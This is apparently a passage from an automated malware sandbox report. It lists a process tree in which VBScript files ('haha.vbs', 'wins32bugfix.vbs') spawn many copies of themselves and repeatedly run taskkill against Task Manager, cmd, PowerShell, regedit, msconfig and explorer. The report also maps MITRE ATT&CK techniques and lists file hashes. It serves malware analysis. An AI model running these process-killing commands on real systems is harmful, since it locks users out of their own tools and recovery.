        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        745⤵
        
        PID:10108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        746⤵
        
        PID:21144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        747⤵
        
        PID:25604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        748⤵
        
        PID:25656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        749⤵
        
        PID:25696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        750⤵
        
        PID:25744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        751⤵
        
        PID:25776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        752⤵
        
        PID:25812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        753⤵
        
        PID:25856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        754⤵
        
        PID:25920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        755⤵
        
        PID:25980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        756⤵
        
        PID:26040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        757⤵
        
        PID:26128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        758⤵
        
        PID:26184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        759⤵
        
        PID:26252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        760⤵
        
        PID:26320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        761⤵
        
        PID:26380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        762⤵
        
        PID:26424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        763⤵
        
        PID:26492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        764⤵
        
        PID:26556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        765⤵
        
        PID:16600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        766⤵
        
        PID:18384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        767⤵
        
        PID:25804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        768⤵
        
        PID:10732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        769⤵
        
        PID:5008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        770⤵
        
        PID:14156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        771⤵
        
        PID:25884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        772⤵
        
        PID:10812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        773⤵
        
        PID:2312
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\wins32bugfix.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2588
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3276
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3676
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1928
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4584
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4352
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3552
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6168
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6308
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6468
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6612
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6748
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6916
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7072
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:8308
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:8496
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:8652
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:8808
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      PID:8944
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:8536
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:8320
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:10476
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:11096
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:10684
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:2996
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:10744
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:10520
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:10400
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:1428
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:12604
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:12084
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:12660
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:13064
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:6456
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:12836
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:14240
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:12864
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:13528
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:14068
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:14456
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:14660
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:14856
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:16008
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:16372
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:16060
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:13296
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:15476
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:6988
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:15464
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:8732
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:17588
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:17864
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:18124
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:3940
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:14504
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:10056
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:15652
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:11492
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:5672
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:12804
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:12644
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:19588
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:19844
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:9252
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:20516
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:20748
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:20972
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:21232
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:21476
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:14260
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:4480
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:6792
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:7604
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:15504
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:12548
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      PID:24040
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:24412
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:14496
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:18384
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:15216
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:17568
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      PID:19416
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:19192
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:24668
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:25100
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:13052
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:19672
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:13744
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:17304
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:7908
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      PID:2584
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:25884
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:26068
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:26240
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:26468
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:25640
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:18744
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:18848
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2316

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1304

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:2228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1EE2A8B033EB8C8D30746A1B3BD4E662

Filesize
504B

MD5
b604ae70f5b032f6c8264748a3da7bfc

SHA1
37eb2cbe2e2c6383215abb0ffc95e4cc108803a8

SHA256
f2a05a74357f76c06985cc6504b1673d27a7b22546104cb450ce7e7cbc95f71e

SHA512
67bbf34e2b2b8113bf99259efeabc09e10348eb100916a43bf4207ccabe5e16c61bfa928df34bbd09a755dc340e72a9a9282ec289c2182238db8d7981022add1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5baba98c0e19d7c517d2162817e3b908

SHA1
051ddb9eb4edabd59cb100d70700a950667dd263

SHA256
74fb1256e04e90c5c1d886585c242a78e8ac94a6abf8570af72472569cd83407

SHA512
eea75e98ac75f3fd5368162a106020884ac8490dbab4537b3488f3473276a96dc460a33186e016285515dee85162fda4014d5823acc95e2c9b2e7fa297ba5293

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35DDEDF268117918D1D277A171D8DF7B_35F8500DD4A291FDDC2DA5DB7F867071

Filesize
471B

MD5
3d1595adb2d5c35e420519a44382539d

SHA1
eefbde0f9022c17f4e83d08b6d954ee0cfed1640

SHA256
7b93dbe4d04cb13f5ab6b8334224e4ec10ece87532fe344114016a4e7b1d3ab9

SHA512
c77e991a6c11bdc08296f09afb5e78a6ff7e2daf6ba9ec60bc5c5ac82b66dd93a69501f95d673c0a3cbdec7347ee80e059cdaafa6bf4e1d7d6fa1d1e42afc239

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311

Filesize
472B

MD5
9ef2c2194981123acae3bda5e4a7d5a6

SHA1
147bbc1c34deae5315c78466e618aac1c4a28ff1

SHA256
1579359f1b18e458a961d842aeb9ccb42b1c8327d1a1388bb341cc4048701705

SHA512
8555e2aa8568e8d514ae6c84032201f6878e6a762e4c118e18763bb0e1b1f652e55083600cd04fcedbd177ae4b70271dc9c05d6c92512f911ffaa0dbbc5337dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7

Filesize
472B

MD5
7bfed2cee5be2d2d1bea8767e9ab8d44

SHA1
7b519cf091a905e7887b7d4810f06ad532578e17

SHA256
afc360ad163f3a01bf3dcc8505e114baa48ecbd0840a404f7f3e12b6305e2d55

SHA512
eaf74c7be982bfd3d1125839628b15cc176762426d41d646308f149ef7261aee5441f6a5026a8a698a6f41cc78496471618d9d9ca1475117e0348cc65b9304be

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Filesize
471B

MD5
1206dc0dad06a555b338907e17b7b9af

SHA1
5287b539583b53c378804aef177aa68b67b81ae6

SHA256
a88918de9c4aeb1723abd7a6b01c39e0d7c1a2d9ae6b37305136106e99ce324b

SHA512
5901a6ab794cc91e9be6ca4dd38a6076f45ebd84891f6c3847b9837154d4acef907f63c24d829c356ca9b54943e1b89015e7074db1a3e788f778c90a26feb7e7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
9805dbe5181f4f6840751b880da5e14a

SHA1
14c2770b82c118c4a44538b0b565f2fea146ada3

SHA256
3a12a31364ffcee985a573f7d0a1d6c2ed92432038bc9a47977ff1d1f8e1b186

SHA512
451408c30733d7b6c922cb2cd7c2474f2a901f13780d310dcec3b0f9237e00c663c9af6d3d65547d696632a301d6b3d79dca893ea3bfff78d1e28864d0865880

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
53ad0244940afbbcae67ddf84c3ed51e

SHA1
1f874a7f3594fe7cf1c04eb576deec9464905921

SHA256
b49b39c7e41c40e70e624fc17582b01370d7df81e0e91dee1065f1ce3e854d5e

SHA512
6185a92044e16e6b61f1a8b4a1d3836576b308f1f8521aad69a729323bf3590fdc019ebcd65f1b47fc74d34357ccb7824bd5dfd7443cabd9a253c13959b73e17

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1EE2A8B033EB8C8D30746A1B3BD4E662

Filesize
550B

MD5
1d797a7e10ba8e5ec97c3456cd8dfc2f

SHA1
b8578e8b8e5d3a5c8277547b985c6eb01e5928c4

SHA256
f69d9cbf5522215698f255340db58b5fe6e30e1a04c6a89643cfa727c9028963

SHA512
59bd89d167569b086a1f4e607a7f3da2a0c84283a0834e8899e8df0181b6e9fa9e1cbc535ea9d570ec0eb32d49a8df83775e6c7c08ecd04b6a972e6ad306e819

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
2989cb7c45a34d44ec334ca17e47663a

SHA1
a9c791207cc3fe9dd341c78a60a1e7dfac963969

SHA256
61f81ffb3c7722b131583195c14850fc8854bc1880d77ebc6e0ef74abf525245

SHA512
bc85cf705ae9a7ffd62ed4a1ded2fb7e796226483bccc66e18229e6742fba88ca52b83c32dde10b3e7435c830b64b8b9d4ea77a2537d1257368f7c724b8e1d06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171D8DF7B_35F8500DD4A291FDDC2DA5DB7F867071

Filesize
408B

MD5
be77ad9d47ffd149934c2577d9a5332a

SHA1
68fa51282b062c9513a82fee8b3e4ba30ed483a7

SHA256
63e970ed550c7137de931d2dd47c3bd5216ea3f6bc92e931b4274601a1047ff8

SHA512
ad9d6b68301271be085e7f620f474e39425cb36d1287ab91619e5e751b39dac577f33ff83b92bebeff85e17cd961dcabc32418fbb7e3f98adaa175138825e75a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311

Filesize
398B

MD5
cc96f371524a51279c9ea922fc380023

SHA1
ad139c6699d7173454f551f6947f8c351f2ec0c0

SHA256
4500663f922b61b1631dce57916bc8911d23f271238d43da5572805d870ee237

SHA512
f9717b0b0c481024721b8cfa6e6b2e8ddce93e81a2ba6cbb051ad6f37d7d654248656a1792de097b8f86fdaa7ab334c273be784b11393994ca335435c1c114b2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4acda12d461dd4feef2f444cee094ba4

SHA1
a84f38c0212d53ceed5491e862f5d656b0b8b854

SHA256
68141f8891ff77192cc281012df285aa607167a5e291f4dbd9822ad6b66ebed2

SHA512
b4afdc2fa6bffeb4b21ec96c3b0999b151fd13e76f39256a615a8521037c08cada4344898202ad7045387fbdbcbeeecb32cc900351190699b8291a3c62998815

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5d17f107ae04b82c66e5aeb4478b4838

SHA1
1abcafe736c73eee602fc3bffe76e0028b694928

SHA256
e54e86cfcec88bc1899bfcc812bb630de49c9db13dad8f07fd1b5591b0b3baa2

SHA512
653460ec9acae853cf99c96db432ad49095ea8be1d355d73ae7f9c0b277ca065897550bfbfa194eaed629ac2189e7d8293f29703c6a6f94d7c0bfffb87f519ae

Download Submit
